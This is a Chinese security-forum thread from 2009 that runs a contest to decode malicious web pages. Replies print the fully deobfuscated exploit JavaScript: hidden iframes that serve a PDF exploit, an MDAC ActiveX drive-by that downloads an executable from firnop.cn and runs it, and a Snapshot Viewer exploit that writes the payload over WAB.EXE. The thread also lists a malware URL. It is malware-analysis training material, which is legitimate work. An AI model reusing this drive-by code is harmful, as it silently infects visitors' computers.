查看: 3225|回复: 10
收起左侧

[其它] [解密悬赏][第14期][结束~]

[复制链接]
qianwenxiang
发表于 2009-1-13 21:34:31 | 显示全部楼层 |阅读模式
宗旨:
让更多人了解如何解密网马
规则:
1、Hunter不能参加活动
2、必须把所有木马地址全部解出,不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志,如果没有,请发出具体解密过程
4、当第一个人成功完全解密后,将根据难度给予其相应经验,所有URL全部解完之后本帖将锁定
5、如果有违反1~2条规则的情况,本帖随即锁定,之后成功解密的作废!
6、锁定后,会重新修改本次的解密地址,并且开帖!
7、为了体现悬赏帖宗旨,昨日解密成功者再次解出今天网址的只能得到对应网址70%经验




解密地址(替换HXXP为HTTP):


hxxp://www.firnop.cn/

(完成情况:完成 by knifed @ 3L ; lichun005 @ 5L)


一次解完(包含解密步骤)=15
分步(即未解完情况)=每步5
很夸张的丢我两个PDF就404了。。不知道是不是COOKIES检测。。


hxxp://qqqqkkkss.cn/4/14.htm

(完成情况:完成 by dearhaoji @ 10L)

一次解完,包含解密步骤=6



注意:这些地址含有恶意软件,可能会危害到您的计算机。请不要直接打开,否则因此造成的一切后果我们概不负责!
参考解密工具:
FreShow(英文)、
Redoce 1.6(中文)、malzilla (英文,但是乃神器也)
http://glacierlk.cn/openlab/jm.htm
参考解密教程:
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550

http://www.jimmyleo.com/share/FreShow!.rar(推荐!不会用FreShow的可以看看)


(时限=1天)(至2008.01.14 19:00止)
qianwenxiang
 楼主| 发表于 2009-1-13 21:35:21 | 显示全部楼层
如果第一个站打不开的话等下我把他扔给我的两个PDF传上来
knifed
发表于 2009-1-13 21:56:04 | 显示全部楼层
我的两个都打不开
qianwenxiang
 楼主| 发表于 2009-1-13 22:01:23 | 显示全部楼层
ps. 第二个freshow redoce均打不开 但是……

两个PDF

getfile.rar

6.83 KB, 下载次数: 71

knifed
发表于 2009-1-13 22:33:10 | 显示全部楼层
<script type='text/javascript'>
function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}
try {
if (navigator.plugins) {
  for (var i=0;i<navigator.plugins.length;i++) {
   var name = navigator.plugins.name;
   if (name.indexOf('Adobe Acrobat') != -1) {
    document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
    setTimeout('goPDF();',4000);
    break;
   }
  }
} else {
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',4000);
}
} catch (e) {
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
setTimeout('goPDF();',4000);
}
</script>
这个是否就是.但下面具体的不太明白.

评分

参与人数 1经验 +5 收起 理由
qianwenxiang + 5 加分鼓励(1步)

查看全部评分

qianwenxiang
 楼主| 发表于 2009-1-13 22:37:11 | 显示全部楼层

回复 5楼 knifed 的帖子

是的 下一步就是PDF解密了
lichun005
发表于 2009-1-13 22:55:27 | 显示全部楼层
---------------------------
Microsoft Internet Explorer
---------------------------

好像也只有pdf后缀可疑吧
88d969c5-f192-11d4-a65f-0040963251e5
06071漏洞?
才接触,不熟悉
<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck() { return true; }
window.onerror=errfuck;

function dddec(str) {
cto="QHdtR1FKhPGv4VbuDxN0AE3fBgpXmOYIqzyJj5wTWnr2cL8ZilUaCM96So7kse"; cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"; res="";
for (i=0;i<str.length;i++) {
  c=str.charAt(i); pos=cto.indexOf(c);
  if (pos!=-1)
   res+=cfrom.charAt(pos);
  else
   res+=c;
}
return res;
}

function goMDAC(){
d8= 0;
  var Qy29Nd = document.createElement(dddec("hfDdER"));
  Qy29Nd.setAttribute("id",dddec("p1MsU4"));
Qy29Nd.setAttribute("classid",dddec("ENvK4:lwsoZSSo-oSj9-CCwe-sk9j-eeZe6TZMsm9o"));
try{
var LoWMFJ = Qy29Nd.CreateObject(dddec("G4h4f.vRtdGg"),'');
var d8 = 1;
}catch(e){}
try{
var PEELt6 = Qy29Nd.CreateObject(dddec("5udNN.jPPNKEGRKhB"),'');
var d8 = 1;
}
catch(e){}
if(d8 == 1)
{
try
{
var JB7Ebp = Qy29Nd.CreateObject(dddec("gvAgNM.8acnYYJ"),'');

  JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
  JB7Ebp.send();
  LoWMFJ.type = 1;
  LoWMFJ.open();
LoWMFJ.Write(JB7Ebp.responseBody);
  Frogxa = "..\\S87ekhV.exe";
LoWMFJ.SaveToFile(Frogxa,2);
eval(dddec("JmmcRo.5udNNmAdEFRd(TthbAG);"));
//return 1;
}
catch(e){}
}
}

function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}

function goSnap() {
var sfrom = 'http://firnop.cn/getexe.php?h=12';
var fuckavo="SB";
var x;
var fuckavp="SB";
var obj;
var fuckavx="SB";
var mycars = new Array();
var fuckava="SB";
mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx) {

setTimeout('window.location = "ldap://"',3000);

for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = sfrom;
var fuckavg="SB";
var buf2=mycars[x];
var fuckavj="SB";

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}
var fuckavqgga="SB";
var fuckavqggxa="SBd";
}

setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);

try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {
  obj = new ActiveXObject("PDF.PdfCtrl");
}
if (obj) {
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',5000);
}
} catch(e){
document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
setTimeout('goPDF();',5000);
}
</script>


[ 本帖最后由 lichun005 于 2009-1-13 22:56 编辑 ]

评分

参与人数 1经验 +15 收起 理由
qianwenxiang + 15 加分鼓励

查看全部评分

雨宫优子
发表于 2009-1-14 09:03:46 | 显示全部楼层
有点熟悉这家伙...
以前似乎解过?
qianwenxiang
 楼主| 发表于 2009-1-14 11:18:36 | 显示全部楼层

回复 8楼 aarwwefdds 的帖子

其实我觉得国外那些网马也在玩生成器 只不过加密手段有点YD而已。。

以前见得多点的那个什么微软什么组件的漏洞,Creative声卡升级程序漏洞,CA在线杀毒漏洞,瑞星在线杀毒漏洞,还有个什么WEB的,带个PDF基本没新的了

现在貌似又从国内毒网COPY 代码。。连var fuckavp="SB"都COPY进去了。。
dearhaoji
发表于 2009-1-14 12:31:34 | 显示全部楼层
第2个htp://pppphhhss.cn/3.exe  。。。小A报this 页面

评分

参与人数 1经验 +6 收起 理由
qianwenxiang + 6 加分鼓励

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 09:36 , Processed in 0.142250 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表